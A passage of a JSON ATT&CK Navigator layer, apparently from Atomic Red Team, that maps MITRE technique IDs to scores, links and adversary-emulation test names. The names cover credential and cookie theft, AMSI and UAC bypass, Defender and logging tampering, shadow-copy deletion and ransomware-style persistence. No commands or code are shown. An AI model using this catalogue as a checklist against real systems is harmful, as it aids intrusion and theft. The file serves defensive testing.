Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies 
(Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process 
cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- 
Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable 
UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in 
Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - 
Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
